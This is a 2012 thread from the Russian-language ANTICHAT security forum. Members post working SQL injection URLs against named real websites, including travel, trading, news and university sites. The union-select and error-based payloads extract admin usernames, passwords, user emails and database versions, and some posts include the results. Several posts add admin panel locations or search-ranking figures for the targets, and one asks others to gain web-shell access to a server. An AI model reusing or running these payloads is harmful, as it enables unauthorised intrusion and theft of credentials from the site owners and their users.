ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
05.04.2012, 23:28
|
|
Guest
Сообщений: n/a
Провел на форуме:
3772
Репутация:
7
|
|
http://tandem-plus.com.ua/index.php?news=25+and+1=2+union+select+1,login,3,p ass,5,6+from+users--
|
|
|
|
06.04.2012, 01:55
|
|
Guest
Сообщений: n/a
Провел на форуме:
103014
Репутация:
76
|
|
Так и не побежденный мною сайт.
Как мы видим, File_Priv = Y, но магические кавычки = ON
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.itradeindonesia.com/market_data.php?sub=-1+union+select+load_file(0x433a5c626f6f742e696e69)--[/COLOR][/COLOR]
Благодаря специфичной реализации сайта, при которой скрипты, составляющие основу юзабилити сайта, как физически присутствуют на сервере в виде отдельных файлов, так и полностью записаны в базу данных, имеется возможность провести sql-инъекцию в сочетании с php-инклудом(я впервые встретил такой наглядный пример, ввиду своего небольшого опыта)
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.itradeindonesia.com/market_data.php?sub=-1+union+select+0x2e2e2f2e2e2f696e646578--[/COLOR][/COLOR]
Это именно то, о чем вы подумали, залитое через админку, и попавшее в БД. Проинклудить это мне не удалось.
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.itradeindonesia.com/market_data.php?sub=-1+union+select+file_upload+from+ps_daily_stock+limit+60,60--[/COLOR][/COLOR]
Саму админку, вы без проблем найдете по адресу
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.itradeindonesia.com/admin.php[/COLOR][/COLOR]
P.S. Сайт является аналогом нашего ололо форекса(онлайн-трейдинг), правил раздела не нарушает, админ поставлен в известность, но пароли от админки как были прежними, так ими и остались, что символизирует. По традиции - если кто-то сможет получить доступ к серверу с помощью веб-шелла, дайте знать. Спасибо. (рад избавиться от этого сайта, стоящего мне бессоные сутки ) |
|
|
|
06.04.2012, 13:07
|
|
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684
Репутация:
136
|
|
http://www.pereslavl.ru/news/world_news.cgi?show_news=-290840%20and%201=2%20union%20select%201,2,concat_w s(char(58),version(),user(),database(),@@version_c ompile_os),4,5,6,7+--
5.0.22-Debian_2-log world_news@localhost world_news pc-linux-gnu |
|
|
06.04.2012, 14:41
|
|
Guest
Сообщений: n/a
Провел на форуме:
3772
Репутация:
7
|
|
http://www.six-sigma.ru/index.php?id=140+and+1=2+union+select+1,+2,+3,+con cat(email,':',pass),+5,+6,+7,+8,+9+from+mail
|
|
|
|
06.04.2012, 20:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
103014
Репутация:
76
|
|
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.telecomsolutions.asia/productdetails.php?pid=-2489+union+select+1,2,3,4,5,6,7,concat_ws(0x03a,AdminId,Username,Password,Email,Status),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96+from+admin_users--[/COLOR][/COLOR]
|
|
|
|
07.04.2012, 00:09
|
|
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582
Репутация:
394
|
|
Код:
Code:
http://www.usu.edu/studemp/offcampus/showdetails.php?jobNum=-4326'+union+select+1,version(),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+
Database Version: 5.1.26-rc-community
Database name: employment
User name: studemp@web01.usu.edu |
|
|
|
07.04.2012, 01:11
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
ozdorov.com
Сообщение от None
http://www.ozdorov.com/view_news.php?id=76'+or+1+group+by+concat((select+ substr(concat_ws(0x3a,email,password),1,99)+from+b c_forumnsp.phpbb_users+limit+0,1),0x00,floor(rand( 0)*2))having+min(0)+or+1--+
10k users
5.1.49-rel11.3-log
Яндекс тИЦ (CY) 10
Google PageRank (PR)
prestig-tur.com.ua
Сообщение от None
http://prestig-tur.com.ua/28.html?id=930+limit+0,0+union+select+version%28%2 9,2--+
Яндекс тИЦ (CY) 10
Google PageRank (PR) 2
continenttour.ru
Сообщение от None
http://www.continenttour.ru/curort.php?id=52%27+or+1+group+by+concat%28%28sele ct+version%28%29%29,0x00,floor%28rand%280%29*2%29% 29having+min%280%29+or+1--+
5.0.26-log
Яндекс тИЦ (CY) 30
Google PageRank (PR) 3
greatsteppe.kz
Сообщение от None
http://www.greatsteppe.kz/view_post.php?id=21+or+1+group+by+concat%28%28sele ct+substr%28concat_ws%280x3a,user,pass%29,1,99%29+ from+userlist+limit+0,1%29,0x00,floor%28rand%280%2 9*2%29%29having+min%280%29+or+1--+
http://www.greatsteppe.kz/admin/
Яндекс тИЦ (CY) 0
Google PageRank (PR) 1
l-art.ru
Сообщение от None
http://www.l-art.ru/notes.php?ID=6%27+or+1+group+by+concat%28%28select +version%28%29%29,0x00,floor%28rand%280%29*2%29%29 having+min%280%29+or+1--+
Яндекс тИЦ (CY) 10
Google PageRank (PR) 2
|
|
|
|
07.04.2012, 03:33
|
|
Guest
Сообщений: n/a
Провел на форуме:
103014
Репутация:
76
|
|
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.space-travel.ru/resorts/14?res=-3+union+select+1,2,3,4,5,concat_ws(0x03a,id,login,password,salt,admin),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+ontravel_users+limit+0,1--[/COLOR][/COLOR]
Админ уведомлен.
P.S. По причине того, что я не смог получить plain их "соленыx" хешей |
|
|
|
09.04.2012, 15:30
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919
Репутация:
229
|
|
delinform.ru ТИЦ-230 blind
Код:
Code:
delinform.ru/tofirmcard.php?num=1004+and+4=substring(version(),1,1)/*
uaq.org.ua ТИЦ-140
Код:
Code:
www.uaq.org.ua/index.php?module=subjects&func=viewpage&pageid=-73+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16,17--
Код:
Code:
4.0.25-standard-log:quality_uaq@hosting3.adamant.net:quality_uaq
farmfresh.org PR-5 Alexa-444k
Код:
Code:
http://www.farmfresh.org/about/news_details.php?news=-32+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5--
Код:
Code:
5.1.39-log:fresh5farm@comhotspot.com:lgfoods
|
|
|
|
09.04.2012, 15:37
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Тиц 250
PR 2
Сообщение от None
_http://www.truck.ru/pages.php?page=-6+union+select+1,2,concat_ws(0x3a,version(),user() ,database())--+f
5.0.51b-community-nt-log:truck@localhost:truck |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
